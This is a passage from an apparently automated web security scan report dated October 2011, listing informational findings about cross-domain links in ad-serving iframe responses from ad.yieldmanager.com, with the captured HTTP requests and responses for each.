auid=34589&cs=4e3c3f8146bae&cb=1317600618_HERE" border="0" alt=""></a>
...[SNIP]...
19.56. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFKuk3b-TRCoYiQ3Z94GxQp0oTcGO6v0chTWRoAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3412748720%26r%3D0%26s%3D2126909,9414ef6a-ed55-11e0-9670-78e7d16291b6,1317601263351 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:05 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0325.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:21:05 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601263_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljN1OhDAQhZ-GO9IUKD8N8QK2khAXdE1XIzcEShGWn2LBgPv0NrLZF3AymfnO5MwxLB.xukCOjUvmQtczmW9YJnNNl3k116Hv-wgaJkYIu1if47AKiAHj4PDInFPwVwSTp53UJF5wErt68QKwEgCQkMm6n74
...[SNIP]...
p1Cf34eaZRm95y1P-DrjfLMmlWoJmR6gossqj4BsTExw0wMahjUUswNcoUSV5LPjeaRRDUTOcqRt5WSjk2xEqzUnE7zlwuuSzGSgz5-D2UXOYNl1wZesGU4xdAmHPK,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601263_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601263_HERE" border="0" alt=""></a>
...[SNIP]...
19.57. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD7eo7vxuPRCsSRxUaSCAr5VGzfc4TqNMRl7oqsAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2505440288%26r%3D0%26s%3D2126909,2f82aa06-ed55-11e0-b5f8-78e7d1f5c970,1317601094620 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:18 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0413.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:18:18 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601094_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljNlqwzAQRb.Gb0Zo84bpgxw14DRKG3Aa3JfgSHIdvCiVXRLy9RV18Q90GGbOHe5cRFKog0onca2SKKRnVKeIYBnhgFQR8WGappgmUQARjYk.5pliHMGcrZ5luGe.xRP-MpObPGZ7M6u3mIEbB4AaK27z6Uv
...[SNIP]...
rVimOJykdLxPLInny.maarR5iH164VmGyl9B2Yqx7uQJreHavagmvjTGura6vHxiOcQg-HDzPoi3IqDGDitDw7vgyjttPJVoMy.Wn47s.anhpttTN0RjrHD6KBcvc=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601094_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601094_HERE" border="0" alt=""></a>
...[SNIP]...
19.58. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZOgIVTeDRCnsRy-TFFKeiJxNOyT7DkE5Q5JrYAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1141245984%26r%3D0%26s%3D2126909,1d6c330c-ed53-11e0-a4eb-78e7d162b08a,1317600205281 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:27 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0171.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:03:27 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600205_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlT11rhDAQ.DW-SUg05wfSh3ipRXqRHsi13otojNXzNDZazvrrG-pxf6DLsjszzA4ssgPLq0uE3LrgGNUu8gNkW9xFbmHXjgmDIECu7SPHgztsTnFYEYpgTPbP3DmSv6I-fd2QntQjR7mxN4-AGwUAS8Vum.T
...[SNIP]...
zNfrILwdn9JX3.ZJrNPI-GTQwr0l2BWRWVWIAcxbAALnstFrUCY6NNkRK1ElNj2BRDw3JWOYi20szZQV9zXmrcDpNQc66KoZJ9Pnz3pVB5I5TQhqvk2vELC2dztQ==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600205_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600205_HERE" border="0" alt=""></a>
...[SNIP]...
19.59. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACGWhGs-N.RCm8qdGRvkffdG-J-T49cls2HJlZzAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D822639712%26r%3D0%26s%3D2126909,eaba2be4-ed52-11e0-aa4d-63b5f8f2f3a6,1317600120228 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:55 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0165.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:02:55 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600120_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTdlugzAQ.BrekGVjrgj1wYQQoQbaVJSIvkRgNnUOMDVUOb6-bonyA12tdmdGs7OEBhXgup7ZVc3BgsomAaEW94hnUQ4mDoKAOg6lnoNdag5J2LCI4ITNN9xds7-KZtHzhPSMfLZOJvbqM3SOELKlSs-T9JX
...[SNIP]...
3Lsrx-HDKR3XP0.ZNpinHsDcoMK9bdoFFVDVyQ7KG7IC5bLVY7hXqhTbGCnYJBGDSysWG5N9nBvtHMdcgv57XG-24ANW5V1TWy3XbfbQ1qK0CBNpwk144fJnd0rg==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600120_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600120_HERE" border="0" alt=""></a>
...[SNIP]...
19.60. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD6RfqYGuTRClsiOGObo7w9R1weVpW9lqw4k6cIAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D231866446%26r%3D0%26s%3D2126909,615ee256-ed55-11e0-a70a-78e7d1fa053c,1317601178272 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:45 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0094.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:19:45 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601178_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTtFugzAM.BreUJQABSq0h9AIDa1Bq0SL2hdEg1m6AmEpUxFfv2xU.YFZln1nnc8mbiQwJhWsGw-7QQMNRMR1ROD4YQNg4yiKHLJygwAHxL6lcU0ZwSndFMLf0b9ga.a2IFNZSHfpwt5Diu4MIU9pfl9GXzz
...[SNIP]...
-vvDhJzvbz8fGn2X-xbTmOg-VSy0lM1mjUVQ0TUgP0ExKqM8Oq0WiQRpRoaDTcpOUyD1uOP6seLrVh.or8cnE2-NLfQI-lrvpadWX.3Z1BlxI0GEGrhFH8AJxYdEU=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601178_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601178_HERE" border="0" alt=""></a>
...[SNIP]...
19.61. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgnEQVe-XRCpGmh9ZS5HpCZz6lne33RURs4zYxAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2748699372%26r%3D0%26s%3D2126909,33c9132e-ed56-11e0-b64e-78e7d15f2c3a,1317601531289 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:25:32 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0205.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:25:32 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601531_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlj99qgzAUxp.GOwnG.yK7iA2CW1PW4Vq6G9EkTqcxLjoqPv2yWvoCO4ST7zv8zhcCndiuGaspZ65TRVFguzF0bBrYFYtoaFpxHEPPCrwIBh40pyxhCEMrQ7sz9Y.oVjjCL5vSHYfomG3uNUTgigFwpSLXbfR
...[SNIP]...
2PnHUkPwkiNHv.kt5.Ms1mnkfDQYad6sPArErGFyBHPiyASqGHZa3A2GgoVbxWfGoMB7uWYfurHHjLtPM9-OdppXU7TFzNhSoHJkUx.IiKq6Lhimugl1QTv4M1dTc=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601531_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601531_HERE" border="0" alt=""></a>
...[SNIP]...
19.62. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACtPaKi-HRCgH5Dl4W0RNCqXgNLdqmDuP.2xG8AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3412195991%26r%3D0%26s%3D2126909,dafdcc46-ed53-11e0-9ddb-2bf6a7f850eb,1317600523324 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:44 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0339.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:08:44 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600523_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyPKDV4R6MEGktAGVCDWCCwLbFNKAU0OVKF9ft6D8QFer3ZnV7AwiPsTcxdwjrU0EZxD6iGDmIua6DTGh7.sWtG1nQyyEzSkOOA0RjOn2yJyM.lW4CV8XpGfo0Sxe2JtHwTUEwJIquS6nr8S
...[SNIP]...
yVXYoLK82Dc7H66P8n0-zm-WIQauBINwezqrm4AXkR4w0wOehj3Spw6bQoUqJVYuoMElrQwM5djqLnmjk2-uWs0bgfJ6HmStUjl0M1fg-NUFUnlNCCs2Ra8QOq5HM2,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600523_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600523_HERE" border="0" alt=""></a>
...[SNIP]...
19.63. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC55tze9ubRCvokzsa33c8p81LO8mAQ4SAyTtLiAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3624405863%26r%3D0%26s%3D2126909,158e3aa0-ed57-11e0-846f-78e7d15f7a00,1317601910069 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:50 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0073.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
